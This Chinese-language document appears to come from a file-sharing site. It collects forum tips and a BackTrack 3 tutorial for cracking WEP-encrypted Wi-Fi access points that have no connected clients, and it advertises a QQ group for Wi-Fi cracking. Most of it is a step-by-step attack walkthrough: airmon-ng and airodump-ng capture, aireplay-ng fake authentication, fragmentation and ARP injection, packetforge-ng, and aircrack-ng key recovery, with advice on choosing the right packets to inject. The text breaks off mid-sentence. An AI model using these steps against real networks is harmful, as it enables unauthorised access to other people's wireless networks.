无客户端破解（修改版）.docVIP

【安逸8】wifi无线技术交流群273716586 PAGE PAGE 1 无客户端研究学习关键 客户端, 关键, 研究, 学习 - 看到很多新人走弯路，说下自己的心得 beini 1.1集成的奶瓶3.1和以前的版本（我看教学视频的）有点区别，那个地方很关键，不明白的会走很多弯路 1、不是每个无客户端，data一直是0的都能破的。。必须抓的到有用的包，才能注入攻击，所以换不同的时间段试 2、关键位置：先用-1虚连，再用interactive_0841抓包注入攻击 这里默认的命令是aireplay-ng -2 -f -p XXXX。。。，这个-f参数，就是关闭了交互模式 问题就在这里，如果抓到的包是个正确的，那当然没问题，注入数据包，看见data飞涨 但是多数情况下，抓到的包都是不对的，这里最好使用交互模式，就是显示个包，问你是否用这个包攻击 先看下抓到的包Dest.MAC 后面是不是都是ff:ff:ff:ff:ff,如果是这个，那么注入攻击没用，必须要抓到Dest.MAC不是ff的包才行 所以，使用-2命令的时候，手动把-f去掉再执行，才不会浪费表情，不停的发无用的包攻击 。aireplay-ng -2 -p XXXX 我这里有个无客户端的，我分享了几天都没搞成功，挂着抓包，15分钟能抓10几个，但是Dest.MAC 后面都是ff:ff:ff:ff:ff,根本破不了 希望对新手有所帮助，别把你自己的无线网卡给挂废了。。转载请注明出自中国无线论坛 /,本贴地址:/thread-109624-1-1.html BT3下破解无客户端wep简明教程 ——穿山甲 以下内容根据本站下的资料修改，非本人原创 一、无客户端wep破解简明步骤 （1）ifconfig –-a （找网卡接口） （2）ifconfig –-a wlan0 up （加载网卡） （3）airmon-ng start wlan0 6 （设监听在6信道） （4）airodump-ng -w 123 -c 6 wlan0 （抓包保存） （5）aireplay-ng -1 0 -e AP的essid -a AP的mac -h网卡mac wlan0 上面是至关重要的虚连接 （6）tcpdump –n –e –s0 –vvv –i wlan0（查看虚连是否成功） （7）aireplay-ng -5 -b ap的mac -h 自己网卡的mac rausb0 （注入） 然后用另外一张卡皇假连接AP，成功得到xor文件 （8）packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 55 –l 55 –y ××××.xor -w mrarp （打包xor） （9）aireplay-ng -2 –r mrarp -x 1024 wlan0 上面是交互注入，AP的data?开始急剧增涨，到2万左右时，另开一窗口 （10）aircrack-ng -x -f 2 xxx.cap （破解密码） 二、无客户端wep详细破解过程 适逢这两天BT3发布，笔者下载刻录后，在BT3下直接破解，同样成功，下面以BT3为例，谈谈破解步骤和心得。 1、装备： 笔记本1台安装BT3系统、卡皇2个 2、启动BT3,打开一个窗口，依次输入： ifconfig –-a （查看网卡 ，顺便记下自己网卡端口wlan0和mac地址） ifconfig –a wlan0 up 回车(加载usb网卡驱动) airmon-ng start wlan0 6 (激活网卡的Monitor模式，后面的6 是你要破解ap 的工作频道 根据实际，换成你破解的ap的实际工作频道。 airodump-ng -w 123 -c 6 wlan0 （开始抓包，其中：wlan0是你破解用的网卡接口名，这样，你的窗口将显示一个工作站，可以看到你要破解的ap的essid 和mac ，并记下ap的essid 和mac） 上面窗口不关，另开一窗口，用自己的网卡与AP建立“虚连接” aireplay-ng -1 0 -e AP的essid -a AP的mac -h 自己网卡的mac wlan0 这时，系统将回显 Sending Authentication Request Authentication successful Sending Association Request Association successful:-) (aid:1) 然后用下面的命令来检查是否已经连接到AP上 tcpdump –n –e –s0 –vvv –i wlan0 成功:则不停闪出数据，按Crtl+C 终止Tcpdump进程，会在最后三行看到以下